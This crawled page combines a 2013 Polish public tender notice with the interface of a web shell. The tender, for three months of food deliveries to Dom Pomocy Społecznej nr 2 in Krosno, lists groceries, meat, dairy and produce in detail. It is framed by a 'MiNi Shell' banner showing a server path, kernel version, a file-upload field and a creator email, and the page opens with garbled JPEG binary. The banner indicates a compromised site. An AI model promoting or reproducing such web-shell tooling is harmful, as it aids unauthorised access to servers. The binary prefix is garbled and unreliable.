JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131127/254017-N-2013.html

<p class="kh_header"><b>Krosno: Zakup i sukcesywne dostawy artykułów spożywczych w okresie od 01 stycznia 2014r. do 31 marca 2014r.</b><br>
<b>Numer ogłoszenia: 254017 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej nr 2 w Krośnie , ul. Kletówki 7, 38-400 Krosno, woj. podkarpackie, tel. 13 43 219 10, faks 13 43 219 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskrosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budzetowa Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywne dostawy artykułów spożywczych w okresie od 01 stycznia 2014r. do 31 marca 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych w miarę zgłaszanych potrzeb do Domu Pomocy Społecznej w nr 2 w Krośnie, zgodnie z wymaganiami określonymi w SIWZ z podziałem na 7 części wg załącznika nr 1 do SIWZ: 
Część 1. Dostawa  artykułów ogólnospożywczych,  
Część 2. Dostawa mięso i wędliny, 
Część 3. Dostawa pieczywo, wyroby cukiernicze, 
Część 4. Dostawa artykuły nabiałowe, 
Część 5. Dostawa warzywa i owoce, 
Część 6. Dostawa mrożonki,
Część 7. Dostawa zupy, sosy, przyprawy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnienie warunków udziału w postępowaniu o udzielenie zamówienia określonych w art. 22 ust. 1 ustawy  - załącznik nr  2 do SIWZ.
2. Oświadczenie Wykonawcy o braku podstaw do wykluczenia w postępowaniu o udzielenie zamówienia określonych w art. 24 pkt 1 i 2  ustawy - załącznik nr  3 do SIWZ. 
3. Formularz oferty - załącznik nr 4 do SIWZ. 
4. Część zamówienia - załącznik nr 1 do SIWZ,
5. Wzór umowy - załącznik nr 5  do SIWZ.
6. Pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowi załącznik nr 5 do SIWZ.
Zamawiający oprócz wypadków wymienionych w przepisach Kodeksu Cywilnego regulujących umowne prawo odstąpienie od umowy przewiduje także możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1.	Termin realizacji zamówienia może ulec zmianie  w następujących sytuacjach:
  a)	w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu i/lub podpisanie umowy,
  b)	w przypadku zawieszenia usług przez Zamawiającego.
2.	Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
  a)	zmiana stawki urzędowej podatku VAT,
  b)	rezygnacji z części zamówienia, jeżeli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy- o wartość niewykonanych dostaw.
3.	Warunki zmian:
  a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
  b)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych usług,
  c)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskrosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej nr 2 w Krośnie, 38-400 Krosno, ul. Kletówki 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 11:00, miejsce: Dom Pomocy Społecznej nr 2 w Krośnie, 38-400 Krosno, ul. Kletówki 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  artykułów ogólnospożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 	
Dżem niskosłodzony do 280 g.	50 szt
Marmolada do 1000 g.	10 szt
Miód naturalny do 1000 g.	20 szt
Koncentrat pomidorowy 30% do 500 g.	50 szt
Produkty zbożowe (kasza jęczmienna, manna, kukurydziana, gryczana) do 1 kg	45 kg
Cukier kryształ do 1 kg 	200 kg
Cukier wanilinowy 	40 szt
Cukier puder	3 kg
Mąka pszenna do 1 kg	150 kg
Mąka ziemniaczana do 1 kg 	5 kg
Płatki jęczmienne do 500 g. 	5 kg
Płatki owsiane do 500 g. 	5 kg
Płatki kukurydziane do 1 kg	5 kg
Herbata granulowana do 100 g. 	90 szt
Kawa zbożowa do 500 g.	5 szt
Kakao ciemne do 200 g.	5 szt
Bułka tarta do 1 kg	10 kg
Olej uniwesalny 	60 szt
Oliwa z oliwek 	2 szt
Majonez do 1 kg 	30 szt
Ketchup do 500 g.	20 szt
Musztarda do 200 g. 	10 szt
Ocet 	2 szt
Sok wysokosłodzony do 500 ml	6 szt
Sok przecierowy owoc.-warz. 0,33 l 	250 szt
Makaron (różne formy) do 1 kg 	100 szt
Sól do 1 kg 	30 kg
Ryż do 1 kg	50 kg
Ryba wędzona 	6 kg
Filet śledziowy marynowany w oleju do 5 kg	7 kg
Koreczki śledziowe do 5 kg	7 kg
Tuńczyk puszka 	10 szt
Filet śledziowy w oleju / sosie pomidorowym (konserwa) 130 g.	60 szt
Drożdże świeże 	0,5 kg
Żelatyna spożywcza 	10 szt
Żurek w butelce 	10 szt
Kukurydza konser do 400 g. 	10 szt
Groszek konserwowy do 400 g. 	20 szt
Ogórki konser 	15 szt
Papryka konser 	10 szt
Pieczarki marynowane	5 szt
Chrzan (słoik) do 300 g.	10 szt
Ciastka	5 kg
Paluszki do 100 g. 	40 szt
Herbatniki do 50 g. 	100 szt
Chrupki kukurydziane	80 szt
Proszek do pieczenia 	10 szt
Kwasek cytrynowy	20 szt

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 	
Kiełbasa wiejska 	7 kg
Kiełbasa żywiecka	3 kg
Kiełbasa zwyczajna	15 kg
Kiełbasa szynkowa	8 kg
Kiełbasa krakowska	5 kg
Kiełbasa biała 	5 kg
Kiełbasa wiejska drobiowa	15 kg
Kiełbasa lenczowa	5 kg
Mortadela	20 kg
Szynka drobiowa	10 kg
Szynka wieprzowa	20 kg
Szynka konserwowa	5 kg
Polędwica wieprzowa sopocka 	5 kg
Polędwica drobiowa	3 kg
Schab pieczony	7 kg
Baleron 	3 kg
Klops 	7 kg
Boczek (wędzony, gotowany)	10 kg
Salceson drobiowy	5 kg
Salceson wieprzowy	5 kg
Pasztet pieczony 	10 kg
Pasztetowa (drobiowa, wieprzowa)	10 kg
Parówki (drobiowe, wieprzowe, cielęce)	40 kg
Serdelki 	10 kg
Kaszanka 	20 kg
Schab b/z kości 	40 kg
Karkówka 	60 kg
Szynka b/z kości	30 kg
Łopatka b/z kości	50 kg
Mięso gulaszowe (wołowe, wieprzowe, drobiowe)	30 kg
Żeberka 	15 kg
Filet drobiowy 	50 kg
Udka 	90 kg
Porcja rosołowa	70 kg
Kości 	10 kg
Kęski drobiowe 	10 kg
Wątroba drobiowa	30 kg
Żołądki drobiowe	10 kg
Flaki (wieprzowe, wołowe)	12 kg
Smalec	3 kg
Słonina	1 kg

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywo, wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	
Chleb mieszany 0,6 kg	600 kg
Chleb wieloziarnisty 0,7 kg	9 kg
Chleb ze słonecznikiem 	8 kg
Chleb orkiszowy	7 kg
Chleb żytni 	7 kg
Bułka zwykła 100 g.	250 kg
Bułka grahamka 100 g.	12 kg
Drożdżówki różne	120 szt
Chałka	20 kg
Ciastka kruche z marmoladą	5 kg

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykuły nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	
Mleko 2% 	1700 l
Śmietana 18%	135 l
Ser biały półtłusty	180 kg
Ser żółty 	20 kg
Ser topiony 100 g.	11 kg
Serek twarogowy 100 g.	150 szt
Serek homogenizowany owocowy 125 g.	160 szt
Masło (kostka)	120 kg
Margaryna mleczna (kostka 250 g.)	2,5 kg
Kefir - kubek 400 ml	40 l
Jogurt owocowy 150 g.	80 szt
Jogurt owocowy b/c 150 g.	80 szt
Jogurt naturalny	30 szt
Maślanka 	72 l

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 
Marchew 	240 kg
Pietruszka 	75 kg
Seler 	60 kg
Cebula	60 kg
Buraki ćwikłowe	100 kg
Kapusta biała	100 kg
Kapusta czerwona	10 kg
Kapusta pekińska	15 szt
Brukselka	10 kg
Kalafior	15 szt
Brokuł	15 szt
Fasolka szparagowa	10 kg
Kalarepa 	20 szt
Sałata zielona	40 szt
Cukinia	10 kg
Pomidor 	70 kg
Ogórek świeży	50 kg
Papryka świeża	10 kg
Por	30 szt
Botwina	10 szt
Pietruszka zielona	150 szt
Koper	100 szt
Szczypior	110 szt
Rzodkiewka	30 szt
Biała rzodkiew	15 kg
Kapusta kiszona do 1 kg 	50 kg
Ogórek kiszony do 400 g.	20 kg
Fasola + groch 	15 kg
Czosnek 	30 szt
Pieczarka świeża 	12 kg
Jabłka	250 kg
Gruszka	40 kg
Banany	50 kg
Pamarańcze	30 kg
Mandarynka	30 kg
Cytryna	5 kg
Czereśnie 	15 kg
Morela 	15 kg
Brzoskwinia	15 kg
Nektarynka	15 kg
Śliwka	40 kg
Rabarbar	10 kg
Truskawka	25 kg
Owoc jagody (borówka) 	10 kg
Wiśnia 	5 kg
Kiwi	120 szt
Winogrono	25 kg
Arbuz	30 kg
Jaja	1500 szt
Ziemniaki	1500 kg
Grzyby suszone	1 kg
Owoce suszone (jabłko, gruszka, śliwa)	15 kg

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	
Mieszanka owocowa	30 kg
Mieszanka warzywna	30 kg
Truskawka	10 kg
Czarna porzeczka	5 kg
Brokuł	7 kg
Kalafior	7 kg
Ryba - dorsz filet	45 kg

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa zupy, sosy, przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	
Barszcz biały	2 kg
Żur	2 kg
Sos sałatkowy	1 kg
Galaretka owoc.	3 kg
Kisiel	5 kg
Budyń	4 kg
Jarzynka 	5 kg
Przyprawa w płynie do zup, sosów	36 kg
Przyprawa do mięs	0,5 kg
Przyprawa do ryb	0,3 kg
Pieprz czarny miel.	15 szt
Pieprz ziołowy	20 szt
Papryka w proszku	10 szt
Ziele angielskie	10 szt
Liść laurowy	10 szt
Majeranek	10 szt
Kminek	30 szt

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orientacyjnymi, które mogą ulec zmianie w trakcie trwania umowy.
Przedmiot zamówienia może zostać rozszerzony o inne produkty oferowane przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com